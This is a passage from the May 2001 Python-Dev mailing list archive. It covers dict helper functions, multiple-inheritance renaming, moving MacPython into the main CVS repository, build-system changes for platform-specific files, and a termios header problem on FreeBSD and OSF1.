May 2001 17:53:51 -0400 Subject: [Python-Dev] RE: PySequence_Contains In-Reply-To: <200105052231.RAA17447@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > ... > Surely you knew that "x in y" looped over the items of y? What else > could it have done? It was only defined on sequences! What's a sequence ? I expect I assumed that enduring a Python method call for every element of an *instance* was so expensive that Python didn't bother implementing "in" for instances (just for builtin sequences like lists and strings etc). I *know* I assumed it was so expensive that I never tried it (indeed, I doubt I've used "[not] in" on *any* sort of sequence excepting "if x in s" where s was a tuple, list or string of length no more than 4; for anything bigger I always used a dict or bisect). So it's a personal blind spot likely due to never looking in that direction. From paul at pfdubois.com Sun May 6 03:10:37 2001 From: paul at pfdubois.com (Paul F. Dubois) Date: Sat, 5 May 2001 18:10:37 -0700 Subject: [Python-Dev] multiple inheritance -- what I meant Message-ID: When I suggested a modification to the inheritance clause, class X (Y rename a as b, c as d, Z rename foo as bar): someone suggested this was the same as class X (Y, Z): b = Y.a d = Y.c bar = Z.foo I meant two things by my suggestion: 1. I meant that Y.a would never be found when searching for X.a. In particular, if Z.a exists, and a is not explicity defined in X, X.a is Z.a. 2. More philosophically, rather than being a consequence of the language like the second method is, the proposed syntax is intended to be a clear message to someone reading the class about how the inherited names are being handled. Compare the effort required of a reader to understand these two. (If you think the second one is easier, you probably attended Spam III.) If you can rename in this way there are no problems with multiple inheritance. To be complete you should probably also allow Y undefine x, ... which simply makes Y.x unavailable from X. From Greg.Wilson at baltimore.com Sun May 6 18:26:00 2001 From: Greg.Wilson at baltimore.com (Greg Wilson) Date: Sun, 6 May 2001 12:26:00 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Has anyone else found themselves wanting a method that chooses and returns a dictionary element at random, without removing it (as popitem does)? Or is there some way to tell popitem to return a value without mutating the container? If neither, would this be useful, or is it DHG? Thanks Greg From tim.one at home.com Sun May 6 20:15:57 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 6 May 2001 14:15:57 -0400 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Message-ID: [Greg Wilson] > Has anyone else found themselves wanting a method that > chooses and returns a dictionary element at random, Do you mean "random" or "arbitrary"? "random" means every dict entry is equally likely to be chosen; "arbitrary" means nothing is defined about the result (except that it *is* a dict entry). random is much more expensive to implement (under the covers it's a vector, but a vector with holes, so you can't just pick a *slot* at random then "slide over" to the first non-hole (else a given entry's chance of being selected would be proportional to the # of contiguous holes adjacent to it)). > without removing it (as popitem does)? Note that, in the sense above, popitem() returns an arbitrary element. > Or is there some way to tell popitem to return a value without > mutating the container? No. Easy to write an efficient function that does, though: def arb(dict): k, v = pair = dict.popitem() dict[k] = v # restore the entry return pair Given the new dict iterators in 2.2, there's an easier fast way that doesn't mutate the dict even under the covers: def arb(dict): if dict: return dict.iteritems().next() raise KeyError("arb passed an empty dict") > If neither, would this be useful, or is it DHG? Do you have a particular algorithm, or class of algorithms, in mind for which it is useful? popitem's current behavior is most useful for me in the set algorithms I've used, usually in the form: while working_set: x, dontcare = working_set.popitem() process(x) # which may add more elts to working_set From jack at oratrix.nl Mon May 7 11:39:43 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:39:43 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Folks, now that there's finally a decent (well, somewhat decent:-) Mac CVS client that supports ssh I'd like to move MacPython to sourceforge. There's two ways I can go about this: start a new MacPython project or merge the MacPython stuff into the main Python CVS repository. The Mac specific stuff for Python is all concentrated in a single subtree Mac of the main Python tree (the subtree has its own hierarchy of Python/Modules/Lib/etc directories), so putting it in the main repository should not pollute the filenamespace all that much. It would also have the advantage that a single "cvs update" would update everything (whereas the current situation for Mac developers, where Python/Mac is from a different CVSROOT than Python, does not have that advantage). The downside is that everyone who does a full checkout of the tree would get an extra 1000 or so files on their disk that are pretty useless unless they have a mac. Oh yes, another plus for putting stuff in the main repository is MacOSX support. Some MacPython modules have been "ported" to MacOSX, and I've started on adding them to setup.py, and life would become a lot simpler for people compiling on MacOSX if they had everything available automatically. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From jack at oratrix.nl Mon May 7 11:45:59 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:45:59 +0200 Subject: [Python-Dev] Added a machine-dependent file to the core Message-ID: <20010507094600.217CE312BA0@snelboot.oratrix.nl> To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup of Python does not allow for an easy addition of a platform-dependent sourcefile to the core interpreter (or am I missing something?). This is a bit of functionality I need to port the various Mac modules to MacOSX-python. The platform depende sourcefile has various glue routines for turning MacOS error codes into exceptions and that sort of stuff. Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From jack at oratrix.nl Mon May 7 11:49:17 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:49:17 +0200 Subject: [Python-Dev] Need a search path for modules in setup.py Message-ID: <20010507094917.A8CBF312BA0@snelboot.oratrix.nl> (Don't worry, this is the last in my flurry of OSX related messages:-) Life would be a lot simpler for me if setup.py (the one for the main extension modules) would have a search path for module sourcefiles. As Mac modules currently live in Python/Mac/Modules (as opposed to Python/Modules) not having a search path measn I get ugly "../Mac/Modules/foomodule.c" constructs. I have the code for setup.py ready, is it OK if I check it in? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From loewis at informatik.hu-berlin.de Mon May 7 11:53:54 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 7 May 2001 11:53:54 +0200 (MEST) Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> > There's two ways I can go about this: start a new MacPython project > or merge the MacPython stuff into the main Python CVS repository. There is actually a third option: Use the Python SF project, but create a new module in the Python CVS repository (so no merging would be done). I don't know how much code this is. I'd favour merging the Mac code into the core distribution. If there are loads of Mac-specific modules that not every MacPython user needs, it might be advisable to create a distutils package that contains the extra modules. Such a package should still live in cvs.python.sourceforge.net:/cvsroot/python. Just my 0.02EUR, Martin From guido at digicool.com Mon May 7 16:00:08 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 07 May 2001 09:00:08 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Your message of "Mon, 07 May 2001 11:53:54 +0200." <200105070953.LAA14803@pandora.informatik.hu-berlin.de> References: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> Message-ID: <200105071400.JAA25627@cj20424-a.reston1.va.home.com> [Jack] > > There's two ways I can go about this: start a new MacPython project > > or merge the MacPython stuff into the main Python CVS repository. We have platform-specific subdirectories for so many projects that it's a shame we don't have the Mac code in there as well! The only (small) advantage I can imagine of a separate MacPython project would be that you (Jack) can more easily give others commit permission to the Mac tree without giving them commit permission to all of Python (which requires they gain the trust of a larger group of Python developers). Of course, I don't know if you expect much help from others who are not already Python developers. [Martin] > There is actually a third option: Use the Python SF project, but > create a new module in the Python CVS repository (so no merging would > be done). I don't know much about modules, but would this allow Jack to check out the main code and the MacPython code into a single work directory (which he needs)? If so, it may be the best solution. Note that no matter how you do it, you'll have to submit a tree of RCS files to the SF sysadmins to load, unless you want to lose years of MacPython cvs logs... > I don't know how much code this is. I'd favour merging the Mac code > into the core distribution. If there are loads of Mac-specific modules > that not every MacPython user needs, it might be advisable to create a > distutils package that contains the extra modules. Such a package > should still live in cvs.python.sourceforge.net:/cvsroot/python. Undecidedly yours, (Jack, regarding your Makefile and setup.py changes: I'd wait for opinions on your patches from Neil and Andrew. I don't see why they would have an objection to adding these features, but the specific implementation you propose might be subject to comments.) --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Mon May 7 15:04:15 2001 From: skip at pobox.com (skip at pobox.com) Date: Mon, 7 May 2001 08:04:15 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl> References: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Message-ID: <15094.40271.461338.638822@beluga.mojam.com> Jack> ... I'd like to move MacPython to sourceforge. There's two ways I Jack> can go about this: start a new MacPython project or merge the Jack> MacPython stuff into the main Python CVS repository. I say merge. Skip From nas at python.ca Mon May 7 15:14:52 2001 From: nas at python.ca (Neil Schemenauer) Date: Mon, 7 May 2001 06:14:52 -0700 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: <20010507094600.217CE312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:45:59AM +0200 References: <20010507094600.217CE312BA0@snelboot.oratrix.nl> Message-ID: <20010507061452.A23494@glacier.fnational.com> Jack Jansen wrote: > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup > of Python does not allow for an easy addition of a platform-dependent > sourcefile to the core interpreter (or am I missing something?). No, its still a big ugly hack. :-) > This is a bit of functionality I need to port the various Mac > modules to MacOSX-python. The platform depende sourcefile has > various glue routines for turning MacOS error codes into > exceptions and that sort of stuff. > > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? How would this work? Would MACHDEP_OBJS be set by an autoconf subsitution? Neil From jack at oratrix.nl Mon May 7 15:17:18 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 15:17:18 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by Guido van Rossum , Mon, 07 May 2001 09:00:08 -0500 , <200105071400.JAA25627@cj20424-a.reston1.va.home.com> Message-ID: <20010507131718.C22B7312BA1@snelboot.oratrix.nl> > We have platform-specific subdirectories for so many projects that > it's a shame we don't have the Mac code in there as well! Great! I'll pack up my repository and send it to the sourceforge-powers-that-be shortly. The write permission for other MacPython developers shouldn't be a problem, I think Just is currently the only person with write permission (but I have to check). > (Jack, regarding your Makefile and setup.py changes: I'd wait for > opinions on your patches from Neil and Andrew. I don't see why > they would have an objection to adding these features, but the > specific implementation you propose might be subject to comments.) Definitely. I'll put them up as patches and then see what happens. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From jack at oratrix.nl Mon May 7 15:27:14 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 15:27:14 +0200 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: Message by Neil Schemenauer , Mon, 7 May 2001 06:14:52 -0700 , <20010507061452.A23494@glacier.fnational.com> Message-ID: <20010507132714.B0808312BA1@snelboot.oratrix.nl> > Jack Jansen wrote: > > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup > > of Python does not allow for an easy addition of a platform-dependent > > sourcefile to the core interpreter (or am I missing something?). > [...] > > > > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? > > How would this work? Would MACHDEP_OBJS be set by an autoconf > subsitution? Yes, that's what I had in mind (haven't written the code yet). Similar to the way DYNLOADFILE is set, but empty for all platforms except for OSX. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From nas at python.ca Mon May 7 15:30:42 2001 From: nas at python.ca (Neil Schemenauer) Date: Mon, 7 May 2001 06:30:42 -0700 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: <20010507132714.B0808312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:27:14PM +0200 References: <20010507132714.B0808312BA1@snelboot.oratrix.nl> Message-ID: <20010507063042.D23494@glacier.fnational.com> Jack Jansen wrote: > Yes, that's what I had in mind (haven't written the code yet). Similar to the > way DYNLOADFILE is set, but empty for all platforms except for OSX. Sounds good to me. Try to keep the code somewhat general so that other platforms may use it. Neil From mal at lemburg.com Mon May 7 20:44:55 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 07 May 2001 20:44:55 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <200105051145.GAA14831@cj20424-a.reston1.va.home.com> Message-ID: <3AF6ED27.FB2C077B@lemburg.com> Guido van Rossum wrote: > > > I've attached the patch. Due to a small reorganisation the > > patch is a little longer -- symmetry has its price at C level > > too ;-) > > Looks good on paper, so go ahead and check it in. Watch out for > potential changes caused by Tim's iter-crusade! :-) OK. I'll look into this later this week. > While you're at it, why don't you check in the rot13 codec you posted > -- it's good to have simle examples in the standard library. > It would also be cool to have codecs for common file encodings like > base64, quoted-printable, binhex, uuencode, and even hex > (binascii.hexlify). Right. I'll add these in the next few weeks -- as time comes along. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From martin at loewis.home.cs.tu-berlin.de Mon May 7 23:21:27 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 7 May 2001 23:21:27 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <200105072121.f47LLRc01252@mira.informatik.hu-berlin.de> > I don't know much about modules, but would this allow Jack to check > out the main code and the MacPython code into a single work > directory (which he needs)? Using CVS modules allows to merge parts of the tree into a single sandbox. E.g. you could do macpython python/dist/src &Mac 'cvs co macpython' then would give you a dist/src directory, which also contains a Mac directory (where Mac is another module, alongside with /python, or a CVSROOT/modules entry). You could use an exclude list, e.g. macpython !PC !PCbuild !RISCOS python/dist/src &Mac What you *cannot* do is to merge modules on a per-directory basis; all files in a single directory must come from the same CVS module - you can think of ampersand modules similar to Unix mount(1)ed file systems. Regards, Martin From tim.one at home.com Tue May 8 06:14:22 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 8 May 2001 00:14:22 -0400 Subject: [Python-Dev] Help with SF bug 105470 Message-ID: An ancient bug just got (re?)discovered on c.l.py, which I entered into SF: http://sourceforge.net/tracker/?func=detail&aid=422177&group_id=5470& atid=105470 This has to do w/ gross loss of precision in manifest Python float constants, if and only if a module is loaded from .pyc or .pyo format. Since's it's fp-related, and fp is tricky x-platform, I'd like some volunteers to test this before I check it in. Current CVS Python contains a dormant test case. There's a patch attached to the bug report that activates the test case, and tries to repair the problem. After the patch, the fix works if and only if test_import doesn't fail, neither after deleting all .pyc/.pyo files first, nor if run a second time w/o deleting .pyc/.pyo. Works on Win98SE, but you may have already guessed that . From tim.one at home.com Tue May 8 06:52:37 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 8 May 2001 00:52:37 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: Message-ID: [Jeremy Hylton, on python-checkins] > ... > XXX When should nested scopes by made non-optional on the trunk? Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you're have trouble sleeping tonight . From thomas at xs4all.net Tue May 8 12:14:20 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 12:14:20 +0200 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <15090.64389.746625.331215@anthem.wooz.org>; from barry@digicool.com on Fri, May 04, 2001 at 02:57:09PM -0400 References: <20010503131714.D21814@inetnebr.com> <15090.64389.746625.331215@anthem.wooz.org> Message-ID: <20010508121420.Y16486@xs4all.nl> On Fri, May 04, 2001 at 02:57:09PM -0400, Barry A. Warsaw wrote: > >>>>> "JE" == Jeff Epler writes: > | Why not let us spell this as: > | class X(Y): > | from Y import foo as _sfoo, bar as _sbar > | ... > NS> This already has a meaning in Python. Paul's suggested syntax > NS> is pretty neat, IMHO. > Not if Y is a class though, right? That would currently raise an > ImportError, ... Nope: >>> class string: ... pass ... >>> from string import split >>> string >>> That could be considered a misfeature for more than one reason (like importing from non-module objects, which you now do by inserting the object into sys.modules) but can't be fixed without breaking backward compatibility, except by inventing new syntax. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From Mark.Favas at per.dem.csiro.au Tue May 8 12:34:37 2001 From: Mark.Favas at per.dem.csiro.au (Favas, Mark (EM, Floreat)) Date: Tue, 8 May 2001 18:34:37 +0800 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD Message-ID: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> A change to termios.c in the last couple of days to #include termio.h as well as termios.h breaks the build on FreeBSD, which has only termios.h - needs an autoconf test? There'll probably be other similar systems. Cheers, Mark From thomas at xs4all.net Tue May 8 13:36:38 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 13:36:38 +0200 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? In-Reply-To: ; from tim.one@home.com on Sun, May 06, 2001 at 02:15:57PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Message-ID: <20010508133638.Z16486@xs4all.nl> On Sun, May 06, 2001 at 02:15:57PM -0400, Tim Peters wrote: > Given the new dict iterators in 2.2, there's an easier fast way that doesn't > mutate the dict even under the covers: > def arb(dict): > if dict: > return dict.iteritems().next() > raise KeyError("arb passed an empty dict") You probably want: arb = dict.iteritems().next so that you don't keep on returning the same key,value pair. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From thomas at xs4all.net Tue May 8 14:10:00 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 14:10:00 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:39:43AM +0200 References: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Message-ID: <20010508141000.A16486@xs4all.nl> On Mon, May 07, 2001 at 11:39:43AM +0200, Jack Jansen wrote: > The Mac specific stuff for Python is all concentrated in a single subtree Mac > of the main Python tree (the subtree has its own hierarchy of > Python/Modules/Lib/etc directories), so putting it in the main repository > should not pollute the filenamespace all that much. It would also have the > advantage that a single "cvs update" would update everything (whereas the > current situation for Mac developers, where Python/Mac is from a different > CVSROOT than Python, does not have that advantage). The downside is that > everyone who does a full checkout of the tree would get an extra 1000 or so > files on their disk that are pretty useless unless they have a mac. I'd say merge, except that the number '1000' is very large. Is it really 1000 ? The current Python tree contains only 304 .c and .h files, about 1000 .py files spread out over the tree (567 of which in Lib, the rest in Demo/Tools) and obviously some misc files and CVS stuff, for a total of around 2500 files. Is that 1000 a real number ? No temp files, auto-generated files, .o files etc ? How large are they ? (the average size in the current CVS tree is about 10k) I'd probably still say 'merge', I'm just curious where the large number of files comes from. Is it to keep the changes to the original files minimal ? Given the number of platform-dependant #ifdefs and differently-defined macro's we're using now, I don't see why some of those changes couldn't be moved into the original files, if that's the case. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From thomas at xs4all.net Tue May 8 14:13:39 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 14:13:39 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:17:18PM +0200 References: <20010507131718.C22B7312BA1@snelboot.oratrix.nl> Message-ID: <20010508141339.B16486@xs4all.nl> On Mon, May 07, 2001 at 03:17:18PM +0200, Jack Jansen wrote: > > We have platform-specific subdirectories for so many projects that > > it's a shame we don't have the Mac code in there as well! > Great! I'll pack up my repository and send it to the > sourceforge-powers-that-be shortly. The write permission for other MacPython > developers shouldn't be a problem, I think Just is currently the only person > with write permission (but I have to check). That doesn't mean there isn't a problem. Just doesn't have write access :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From guido at digicool.com Tue May 8 15:35:50 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 08 May 2001 08:35:50 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: Your message of "Tue, 08 May 2001 00:52:37 -0400." References: Message-ID: <200105081335.IAA28415@cj20424-a.reston1.va.home.com> > [Jeremy Hylton, on python-checkins] > > ... > > XXX When should nested scopes by made non-optional on the trunk? [Tim] > Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you're > have trouble sleeping tonight . +1. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Tue May 8 15:41:42 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 08 May 2001 08:41:42 -0500 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: Your message of "Tue, 08 May 2001 18:34:37 +0800." <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> Message-ID: <200105081341.IAA28486@cj20424-a.reston1.va.home.com> > A change to termios.c in the last couple of days to #include termio.h as > well as termios.h breaks the build on FreeBSD, which has only termios.h - > needs an autoconf test? There'll probably be other similar systems. Frankly, I don't see the point of including termio.h at all -- it seems to be a backwards compatibility file. Mark, can you please enter this in the bug database and assign it to whoever checked in the change? :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Tue May 8 16:05:01 2001 From: nas at python.ca (Neil Schemenauer) Date: Tue, 8 May 2001 07:05:01 -0700 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: ; from tim.one@home.com on Tue, May 08, 2001 at 12:52:37AM -0400 References: Message-ID: <20010508070501.A25794@glacier.fnational.com> Tim Peters wrote: > [Jeremy Hylton, on python-checkins] > > ... > > XXX When should nested scopes by made non-optional on the trunk? > > Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you're > have trouble sleeping tonight . Shouldn't the entry in the __future__ file be: nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0)) or am I misunderstanding something? Neil From jack at oratrix.nl Tue May 8 16:07:39 2001 From: jack at oratrix.nl (Jack Jansen) Date: Tue, 08 May 2001 16:07:39 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by Thomas Wouters , Tue, 8 May 2001 14:10:00 +0200 , <20010508141000.A16486@xs4all.nl> Message-ID: <20010508140741.790E5379B72@snelboot.oratrix.nl> > I'd say merge, except that the number '1000' is very large. Is it really > 1000 ? The current Python tree contains only 304 .c and .h files, about 1000 > .py files spread out over the tree (567 of which in Lib, the rest in > Demo/Tools) and obviously some misc files and CVS stuff, for a total of > around 2500 files. Is that 1000 a real number ? No temp files, > auto-generated files, .o files etc ? How large are they ? (the average size > in the current CVS tree is about 10k) It's actually 830 files. This is 320 .py files (130 in Lib, the rest in Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build system), 30 resource files and then assorted things (html documentation, scripts to drive the distribution builder, etc). The .xml and .exp files and about 20 of the .c files are machine generated, so they could technically be left out of the repository. The generation process of these files is a bit painful, though, so I've added them as a convenience (the reasoning is a bit along the lines of the Grammar stuff of the core). The one thing that I should do is clean out the "Unsupported" directory before doing the merge. It contains some stuff that is long dead. But then, it isn't all that many files. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From mwh at python.net Tue May 8 16:41:45 2001 From: mwh at python.net (Michael Hudson) Date: Tue, 8 May 2001 15:41:45 +0100 (BST) Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD Message-ID: Guido van Rossum writes: > > A change to termios.c in the last couple of days to #include termio.h > > as well as termios.h breaks the build on FreeBSD, which has only > > termios.h - needs an autoconf test? There'll probably be other similar > > systems. > > Frankly, I don't see the point of including termio.h at all -- it > seems to be a backwards compatibility file. If you don't include termio.h the build breaks on alpha/OSF1. This sounds to me like OSF1's headers are broken (you can't include sys/ioctl.h without including termio.h first, it seems, or you get complaints about struct termio being undefined). So I'd suggest +#ifdef __osf__ #include +#endif and then see if the build breaks anywhere else (I love unix). Using the sf compile farm, I've tested this on FreeBSD, Linux/x86, Linux/PPC, OSF1/alpha, Linux/sparc, Solaris/sparc (using gcc; cc gives a pile of warnings from redefined macros and then dies 'cause it can't find a valiud license file). So we might need some more magic for solaris using cc. Cheers, M. -- Imagine if every Thursday your shoes exploded if you tied them the usual way. This happens to us all the time with computers, and nobody thinks of complaining. -- Jeff Raskin From fdrake at acm.org Tue May 8 16:45:18 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Tue, 8 May 2001 10:45:18 -0400 (EDT) Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: References: Message-ID: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com> Michael Hudson writes: > If you don't include termio.h the build breaks on alpha/OSF1. This > sounds to me like OSF1's headers are broken (you can't include > sys/ioctl.h without including termio.h first, it seems, or you get > complaints about struct termio being undefined). So I'd suggest > > +#ifdef __osf__ > #include > +#endif > > and then see if the build breaks anywhere else (I love unix). Does it make more sense to do this or to test for termio.h in configure? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From m.favas at per.dem.csiro.au Tue May 8 16:47:39 2001 From: m.favas at per.dem.csiro.au (Mark Favas) Date: Tue, 08 May 2001 22:47:39 +0800 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> <200105081341.IAA28486@cj20424-a.reston1.va.home.com> Message-ID: <3AF8070B.87D3C5B2@per.dem.csiro.au> Guido van Rossum wrote: > > > A change to termios.c in the last couple of days to #include termio.h as > > well as termios.h breaks the build on FreeBSD, which has only termios.h - > > needs an autoconf test? There'll probably be other similar systems. > > Frankly, I don't see the point of including termio.h at all -- it > seems to be a backwards compatibility file. > > Mark, can you please enter this in the bug database and assign it to > whoever checked in the change? :-) Done - Michael Hudson wrote the patch, so I've assigned the bug to Fred Drake -- Mark Favas - m.favas at per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From thomas at xs4all.net Tue May 8 17:52:49 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 17:52:49 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>; from jack@oratrix.nl on Tue, May 08, 2001 at 04:07:39PM +0200 References: <20010508140741.790E5379B72@snelboot.oratrix.nl> Message-ID: <20010508175248.E16486@xs4all.nl> On Tue, May 08, 2001 at 04:07:39PM +0200, Jack Jansen wrote: [ Jack wants to add the +/- 1000 extra files from the MacPython source tree to the Python CVS repository ] > It's actually 830 files. This is 320 .py files (130 in Lib, the rest in > Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build > system), 30 resource files and then assorted things (html documentation, > scripts to drive the distribution builder, etc). I'd say merge it. If there had been decent CVS clients for the mac when you started, those files would have been in the CVS tree already. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From skip at pobox.com Tue May 8 20:22:17 2001 From: skip at pobox.com (skip at pobox.com) Date: Tue, 8 May 2001 13:22:17 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl> References: <20010508141000.A16486@xs4all.nl> <20010508140741.790E5379B72@snelboot.oratrix.nl> Message-ID: <15096.14681.773554.729550@beluga.mojam.com> Jack> It's actually 830 files. ... 120 .c/.h files ... How many of those 120 files are variants of existing source files that (in theory) could be merged with their mainline counterparts? Skip From mwh at python.net Wed May 9 00:27:59 2001 From: mwh at python.net (Michael Hudson) Date: 08 May 2001 23:27:59 +0100 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: "Fred L. Drake, Jr."'s message of "Tue, 8 May 2001 10:45:18 -0400 (EDT)" References: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com> Message-ID: "Fred L. Drake, Jr." writes: > Michael Hudson writes: > > If you don't include termio.h the build breaks on alpha/OSF1. This > > sounds to me like OSF1's headers are broken (you can't include > > sys/ioctl.h without including termio.h first, it seems, or you get > > complaints about struct termio being undefined). So I'd suggest > > > > +#ifdef __osf__ > > #include > > +#endif > > > > and then see if the build breaks anywhere else (I love unix). > > Does it make more sense to do this or to test for termio.h in > configure? If you're asking *me*, I have no idea. I'd hope that no system would be as broken as osf1 is in this regard, but then I'd have hoped that osf1 wasn't this broken too... I guess the test in configure is "safer" in some sense. Getting this perfectly right would probably require more autoconf hackery than one can possibly imagine... ncurses generates an amk script from ./configure that is then run to produce term.h, but I'm not 